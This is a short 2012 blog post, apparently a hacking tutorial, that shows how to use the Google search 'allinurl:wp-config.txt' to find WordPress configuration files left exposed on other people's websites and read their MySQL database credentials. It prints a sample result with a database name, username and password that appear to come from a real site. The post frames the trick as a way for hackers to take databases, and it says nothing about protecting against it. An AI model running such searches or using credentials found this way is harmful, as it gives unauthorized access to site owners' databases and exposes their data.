Wednesday, September 26, 2012

Get Wordpress MySQL DataBases Using Google


Get Wordpress MySQL Database by Google Search
its a bug in in some wodpress websites, it allow Hackers for Getting website's MYSQL database remotly,


Step 1: Search the Code given below on google.com:

allinurl:wp-config.txt

Step 2 : Now click on Any URL

you'll Get MYSQL Database like this

<?php
// ** MySQL settings ** //
define('DB_NAME', 'dbpakde');    // The name of the database
define('DB_USER', 'pakde');     // Your MySQL username
define('DB_PASSWORD', 'tot111'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value

Click Here for Demo

No comments:

Post a Comment